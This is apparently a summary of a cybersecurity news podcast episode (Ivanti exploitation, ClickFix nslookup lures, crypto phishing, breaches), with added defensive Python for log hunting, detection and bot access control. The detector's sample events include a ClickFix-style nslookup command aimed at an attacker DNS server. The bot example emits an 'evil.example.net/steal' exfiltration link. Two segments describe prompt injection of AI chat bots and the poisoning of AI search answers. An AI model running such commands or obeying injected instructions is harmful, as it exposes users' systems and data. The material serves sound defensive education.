Daily Cyber Threat Brief Podcast Summary
Podcast: Daily Cyber Threat Brief
Host: Dr. Gerald Auger, "Jerry"
Episode: 🔴 Feb 16’s Top Cyber News NOW! – Ep 1069
Date: February 16, 2026
Theme: The essential cybersecurity stories for professionals, analysts, and leaders — delivered with analysis, practical tips, and community engagement.
Episode Overview
Dr. Gerald Auger ("Jerry"), cybersecurity pro and educator, breaks down the day's top eight cybersecurity news stories, adding context, practical implications, and humor. He highlights attacker tactics, recent breaches, evolving AI-related risks, regulatory news, and tips for practitioners and those new to the field.
Key Discussion Points and Insights
1. Ivanti RCE Attacks: One Actor Dominated Early Exploitation
[11:09–18:39]
- Summary: A single IP (on bulletproof infrastructure) is responsible for 83% of attacks exploiting recent Ivanti Endpoint Manager Mobile (EPMM) vulnerabilities.
- Key Data: 417 observed attacks; ~320 from one IP; vulnerabilities are being exploited as zero-days.
- Expert Analysis:
- Patch quickly if you haven't already; check firewall logs for listed IPs.
- Bulletproof hosting enables criminals to act with impunity — traditional takedowns are difficult.
- As exploitation tools become more refined (especially with AI), expect faster and more concentrated attack waves:
“If a threat actor is going to get a working valid exploit ... they are going to try to get theirs as quickly as they can.” – Jerry, [13:38]
- Action Items:
- Patch Ivanti EPMM immediately
- Hunt for connections to the known threat IP
- Understand "bulletproof hosting" and why attribution is tough
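The two hunting steps above (check firewall logs for the listed IPs, and notice how concentrated the exploitation is) can be scripted. The following is an added example, not code from the podcast or from Ivanti: it parses constructed syslog-style firewall lines, matches sources against a hypothetical indicator list (the addresses below are documentation ranges, not the real attacker infrastructure), separates accepted from dropped hits, and reports what share of traffic to the EPMM port came from the single busiest source.

```python
"""Hunt firewall logs for known threat IPs and measure attacker concentration.

Added example (not from the podcast or Ivanti). Log format, indicator IPs and
port are constructed for illustration; swap in your vendor's format and the
indicators published in the actual advisory.
"""
import re
from collections import Counter

# Constructed IOC list: hypothetical addresses, NOT the real attacker infrastructure.
THREAT_IPS = {"198.51.100.23", "203.0.113.77"}

# Constructed syslog-style firewall lines (hypothetical host 10.0.0.5 is the EPMM server).
SAMPLE_LOG = """\
Feb 16 02:14:05 fw1 kernel: ACCEPT src=198.51.100.23 dst=10.0.0.5 dport=443
Feb 16 02:14:06 fw1 kernel: ACCEPT src=198.51.100.23 dst=10.0.0.5 dport=443
Feb 16 02:14:09 fw1 kernel: ACCEPT src=192.0.2.10 dst=10.0.0.5 dport=443
Feb 16 02:15:11 fw1 kernel: ACCEPT src=198.51.100.23 dst=10.0.0.5 dport=443
Feb 16 02:16:30 fw1 kernel: DROP src=203.0.113.77 dst=10.0.0.5 dport=8443
Feb 16 02:17:02 fw1 kernel: ACCEPT src=192.0.2.44 dst=10.0.0.6 dport=22
"""

LINE_RE = re.compile(
    r"(?P<action>ACCEPT|DROP) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)"
)


def parse(log_text):
    """Turn raw lines into dicts; lines that do not match the pattern are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            d = m.groupdict()
            d["dport"] = int(d["dport"])
            events.append(d)
    return events


def ioc_hits(events, threat_ips=THREAT_IPS):
    """Every event whose source is on the indicator list, regardless of action."""
    return [e for e in events if e["src"] in threat_ips]


def accepted_hits(events, threat_ips=THREAT_IPS):
    """IOC hits the firewall let through: these hosts need host-level investigation."""
    return [e for e in ioc_hits(events, threat_ips) if e["action"] == "ACCEPT"]


def concentration(events, target_port):
    """(busiest_src, its share, total) for traffic to target_port.

    A single source owning most of the volume is the pattern the episode
    describes (one IP behind ~83% of observed exploitation attempts).
    """
    counts = Counter(e["src"] for e in events if e["dport"] == target_port)
    total = sum(counts.values())
    if not total:
        return (None, 0.0, 0)
    src, n = counts.most_common(1)[0]
    return (src, n / total, total)


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    print(f"{len(ioc_hits(evs))} IOC hits, {len(accepted_hits(evs))} accepted")
    src, share, total = concentration(evs, 443)
    print(f"top source to :443 is {src} with {share:.0%} of {total} connections")
```

Run it against real exports by replacing `SAMPLE_LOG` with the file contents and `THREAT_IPS` with the advisory's indicators; accepted hits are the ones that warrant pulling EPMM application logs for the same time window.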
2. Google's AI Overviews Manipulated by Scammers
[18:39–25:05]
- Summary: Scammers are figuring out how to plant malicious content into Google's AI-generated search answers (Gemini AI), resulting in phishing sites and scams being suggested to users.
- Risks: Users implicitly trust top AI answers, making phishing via this channel highly effective.
- Memorable Quote:
“This is huge ... people are giving this implicit trust to the AI and the responses ... because it can’t be evil, it’s coming directly from Google.” – Jerry, [20:17]
- Practical Advice:
- Educate users and family: always verify info and links from AI overviews, especially those providing support numbers or download links.
- “Any response from AI? Yes, it’s great. But you have, you can’t trust it fully. You have to have some level of skepticism.” – Jerry, [21:37]
3. DNS-based ‘Click Fix’ Attacks Use NSLookup
[25:05–32:14]
- Summary: Attackers using "Click Fix" social engineering convince users to run commands (e.g., via Start→Run) that invoke nslookup against attacker-controlled DNS servers to fetch malware.
- New Tactic: The malicious commands query an alternative, attacker-chosen DNS server rather than the endpoint's configured resolver, sidestepping DNS filtering and the logs defenders normally rely on.
- Educational Moment:
- Click Fix lures users with fake CAPTCHA or "fix this error" prompts into pasting and running PowerShell or DNS commands.
- Core defense: teach users never to run commands suggested by popups or emails.
- “At the end of the day, no matter what, the victim has to hit, start, run and pop open a command run box.” – Jerry, [31:44]
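The defensive angle the segment points at (the victim has to open a Run box and launch the command) is also a detection opportunity: an nslookup spawned from an interactive shell under explorer.exe, pointed at a DNS server that is not one of your resolvers, and asking for TXT records, is a combination that normal users almost never produce. Below is an added example, not code from the podcast or from any vendor: it runs that logic over constructed process-creation events (fields modelled loosely on Sysmon Event ID 1; the resolver list, hostnames and IP are hypothetical). The exact command line the real campaign uses is not reproduced here; the rule keys on the shape of the invocation, not a specific string.

```python
"""Flag ClickFix-style nslookup invocations that point at a non-corporate DNS server.

Added example, not from the podcast. Events mimic Sysmon process-creation
fields but are constructed; CORP_RESOLVERS and all names/IPs are hypothetical.
"""
import re

# Hypothetical resolvers this endpoint is expected to use.
CORP_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe")

# Constructed process-creation events: pid, parent pid, image path, command line.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 150, "ppid": 1, "image": r"C:\Program Files\Monitoring\agent.exe", "cmdline": "agent.exe"},
    # Run-box launch: explorer -> cmd -> nslookup with TXT query at an outside server.
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c nslookup -type=txt verify.example-attacker.test 203.0.113.9"},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup -type=txt verify.example-attacker.test 203.0.113.9"},
    # Benign: monitoring agent doing a plain lookup via the default resolver.
    {"pid": 300, "ppid": 150, "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup intranet.corp.local"},
    # Borderline: user-run lookup, but against a corporate resolver and not TXT.
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c nslookup x.example.test 10.0.0.53"},
    {"pid": 401, "ppid": 400, "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup x.example.test 10.0.0.53"},
]


def parse_nslookup(cmdline):
    """Extract query name, explicit server (2nd positional arg) and query type."""
    tokens = cmdline.split()
    idx = next((i for i, t in enumerate(tokens)
                if t.lower().strip('"').endswith(("nslookup", "nslookup.exe"))), None)
    if idx is None:
        return None
    rest = tokens[idx + 1:]
    opts = [t for t in rest if t.startswith("-")]
    positional = [t for t in rest if not t.startswith("-")]
    qtype = None
    for o in opts:
        m = re.match(r"-(?:type|q|querytype)=(\w+)", o, re.I)
        if m:
            qtype = m.group(1).upper()
    return {"name": positional[0] if positional else None,
            "server": positional[1] if len(positional) > 1 else None,
            "qtype": qtype}


def shell_under_explorer(event, by_pid):
    """True if the process was started by cmd/powershell whose parent is explorer.exe."""
    parent = by_pid.get(event["ppid"])
    if not parent or not parent["image"].lower().endswith(SHELLS):
        return False
    grand = by_pid.get(parent["ppid"])
    return bool(grand and grand["image"].lower().endswith("\\explorer.exe"))


def detect(events, resolvers=CORP_RESOLVERS, threshold=2):
    """Alert when at least `threshold` suspicious traits coincide on one nslookup."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not e["image"].lower().endswith("\\nslookup.exe"):
            continue
        info = parse_nslookup(e["cmdline"])
        if not info:
            continue
        reasons = []
        if info["server"] and info["server"] not in resolvers:
            reasons.append(f"explicit non-corporate DNS server {info['server']}")
        if info["qtype"] == "TXT":
            reasons.append("TXT query (can carry payload or command data)")
        if shell_under_explorer(e, by_pid):
            reasons.append("interactive shell under explorer.exe (Run box / pasted command)")
        if len(reasons) >= threshold:
            alerts.append({"pid": e["pid"], "name": info["name"],
                           "server": info["server"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["pid"], a["name"], a["server"], "|", "; ".join(a["reasons"]))
```

The threshold keeps a lone trait (an admin running nslookup by hand against the corporate resolver, as pid 401 does) from paging anyone, while the Run-box launch of a TXT lookup at an outside server trips all three.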
4. Snail Mail Phishing Targets Crypto Users
[32:14–38:53]
- Summary: Physical letters sent to Ledger/Trezor hardware wallet users urge them to provide their recovery phrases under false pretenses.
- Notable Aspects:
- Highly targeted and personalized, using breached contact data.
- Realistic design; phishing website is convincing.
- Insight:
- Even tech-savvy hardware wallet users may fall for this, but usually these users are more skeptical.
- Traditional phishing principles apply: fake urgency, threat of lost access.
- "These criminals really invested in the infrastructure ... This website looks clean, it looks legit. I could see someone falling for this." – Jerry, [34:49]
- Advice: Inform users these attacks exist—mail phish can be effective, albeit costly for the attacker.
5. Estonia Urges Europe to Build Offensive Cyber Capability
[46:08–52:31]
- Summary: Estonia’s spy chief calls for Europe to invest in homegrown offensive cyber ops, not just defense.
- Big Picture:
- Estonia, an early digital adopter, was hit by major cyberattacks in 2007.
- The US and UK are already pursuing 'hack back' and offensive security policies.
- Philosophical Question: Should defenders legally attack back? Pros: deterrence; Cons: escalation and collateral damage.
- Quote:
“If you slap [someone] and then they come around and slap you back, well, maybe next time you think twice...” – Jerry, [51:15]
6. Ring Cancels Flock Partnership After Privacy Uproar
[52:31–56:31]
- Summary: After a controversial Super Bowl ad, Ring (Amazon) cancels plans with Flock Safety (police surveillance tech), amid privacy/facial recognition fears.
- Analysis:
- Mass surveillance concerns are finally reaching mainstream awareness.
- “...digital surveillance, techno digital technical surveillance, the Flock cameras, mass deployment... It’s all over the place.” – Jerry, [54:09]
- Takeaway: End-users and the public are waking up to surveillance and AI-powered monitoring risks.
7. Dutch Telco Odido Data Breach – 6.2M Customers Exposed
[56:31–57:05]
- Summary: Major breach in the Netherlands; customer PII and bank account details were exposed (passwords and location data were not).
- Desensitization:
- Breaches of this scale are now routine: “Just replace the variables ... this story happens every single day.” – Jerry, [57:33]
- Actionable Reminder: Tabletop exercises — know your breach notification and crisis response plans.
8. Zero-Click Link Preview Attacks via Messaging Apps & AI
[61:13–62:03]
- Summary: Attackers use prompt injection against AI messaging bots (Slack, Telegram) to make the bot emit an attacker-chosen link; the platform's link preview (unfurl) then fetches that URL automatically, so no user click is required.
- Expert Deep-Dive:
- AI agents (like OpenClaw/Karn) need careful permission control & identity management.
- Risks: Over-permissioned bots, no restriction on who can command, leading to major compromise.
- “People are going YOLO giving AI all the permissions ... if anyone else can get in there and tell it to do something, it will gladly do it.” – Jerry, [62:25]
- Action:
- Implement least privilege for AI agents.
- Control access to bots & verify identities.
- Consider local LLMs for sensitive environments.
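The three action items above map onto three gates a bot should pass every request through: verify who is speaking, enforce per-principal tool permissions, and refuse to auto-fetch any URL the model emits unless its host is allowlisted. The following is an added example, not code from the podcast or from any of the agent products it names; the HMAC signing scheme, shared secret, principals, grants and allowlist are all hypothetical stand-ins for whatever the chat platform and your deployment actually use, and `fake_model` simulates a prompt-injected reply rather than calling any LLM.

```python
"""Authenticate, authorize, then apply an egress policy to an AI bot's output.

Added example, not from the podcast or any agent product it mentions.
SIGNING_SECRET, TOOL_GRANTS, PREVIEW_ALLOWLIST and fake_model are hypothetical.
"""
import hashlib
import hmac
import json
from urllib.parse import urlparse

SIGNING_SECRET = b"hypothetical-shared-secret"  # would come from the platform's app config

# Least privilege: the tools each verified principal may invoke.
TOOL_GRANTS = {
    "U_ALICE_ADMIN": {"search", "summarize", "run_query"},
    "U_BOB_GUEST": {"summarize"},
}

# Link previews are generated only for these hosts; anything else stays an unfetched URL.
PREVIEW_ALLOWLIST = {"docs.example.com", "wiki.example.com"}


def sign(body: bytes, secret: bytes = SIGNING_SECRET) -> str:
    """HMAC-SHA256 over the raw request body (hypothetical platform scheme)."""
    return hmac.new(secret, body, hashlib.sha256).hexdigest()


def verify_request(body: bytes, signature: str, secret: bytes = SIGNING_SECRET) -> bool:
    """Constant-time check so an unsigned or forged command never reaches the model."""
    return hmac.compare_digest(sign(body, secret), signature)


def authorize(principal: str, tool: str) -> bool:
    """Deny by default: unknown principals have no grants."""
    return tool in TOOL_GRANTS.get(principal, set())


def partition_links(text: str):
    """Return (urls_safe_to_unfurl, urls_blocked); blocked ones are never fetched."""
    safe, blocked = [], []
    for token in text.split():
        if token.startswith(("http://", "https://")):
            host = (urlparse(token).hostname or "").lower()
            (safe if host in PREVIEW_ALLOWLIST else blocked).append(token)
    return safe, blocked


def fake_model(msg: dict) -> str:
    """Stand-in for the LLM: a prompt-injected reply that smuggles an attacker URL."""
    return ("Summary ready. See https://docs.example.com/guide and "
            f"https://evil.example.net/steal?u={msg['user']}")


def handle(raw_body: bytes, signature: str) -> dict:
    """Pipeline: authenticate -> authorize -> model -> egress policy on emitted links."""
    if not verify_request(raw_body, signature):
        return {"status": "rejected", "reason": "bad signature"}
    msg = json.loads(raw_body)
    if not authorize(msg["user"], msg["tool"]):
        return {"status": "rejected", "reason": f"{msg['user']} not granted {msg['tool']}"}
    reply = fake_model(msg)
    safe, blocked = partition_links(reply)
    return {"status": "ok", "reply": reply, "preview": safe, "blocked": blocked}


if __name__ == "__main__":
    body = json.dumps({"user": "U_BOB_GUEST", "tool": "summarize"}).encode()
    print(handle(body, sign(body)))
    print(handle(body, "0" * 64))
```

The egress gate is the piece that specifically defeats the zero-click preview: even when an injection succeeds and the model writes the attacker's link, the bot only ever unfurls hosts you chose in advance, and the signature and grant checks keep an uninvited principal from issuing the command in the first place.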
Notable Quotes & Moments
- On Snail Mail Phishing: “Even the website ... these criminals really invested ... If you’re smart enough to be running a hardware wallet ... you have a healthy level of skepticism ...” [34:49]
- AI Security Parable: “It’s not complicated, you have to think through the threats and the risks ... or you’re going to get screwed.” [62:45]
- On Conference Talk Anxiety: “The absolute worst thing that could happen ... is that people won’t even remember” [Post-show Q&A]
- On AI Agents: “AI is super smart, but it’s also super stupid, right?” [62:50]
Timestamps for Key Segments
- [11:09] Ivanti Attacks Analysis
- [18:39] Google AI Search Abuse by Scammers
- [25:05] DNS Click Fix via NSLookup
- [32:14] Ledger/Trezor Crypto Snail Mail Phishing
- [46:08] Estonia Offensive Cyber Policy
- [52:31] Ring & Flock Privacy Blowback
- [56:31] Dutch Telco Data Breach
- [61:13] Link Preview, Zero-Click AI Attacks
- [Jawjacking/Q&A] Community questions — CISP prep, Google certs, OpenClaw set-up, career advice
Community & Tone
The podcast thrums with an inclusive, conversational spirit, taking cybersecurity seriously but maintaining levity and openness, e.g.:
- Music breaks ("let the la-la-las wash over you")
- Shout-outs to first-timers; encouragement for learners
- Practical “preacher-in-the-classroom” tone on risk, user education, and non-technical user protection
Final Takeaways
- Patch fast, check logs, and don’t trust single data points or AI-generated information blindly.
- End-user education is more vital than ever (phishing, AI, strange commands, physical mail).
- AI security requires careful thought—least privilege, identity control, and monitoring.
- The “ordinary” breach is now table stakes—practitioners must prioritize response muscle-memory and communication.
- Privacy and surveillance discussions are entering the mainstream—share awareness, not just technical knowledge.
- Vibe: Collaborative, positive, and real-world relevant — “It takes a village”; “We’ve got work to do, let’s do it together.”
For the full daily brief and additional resources, head to Simply Cyber’s YouTube or Discord community.
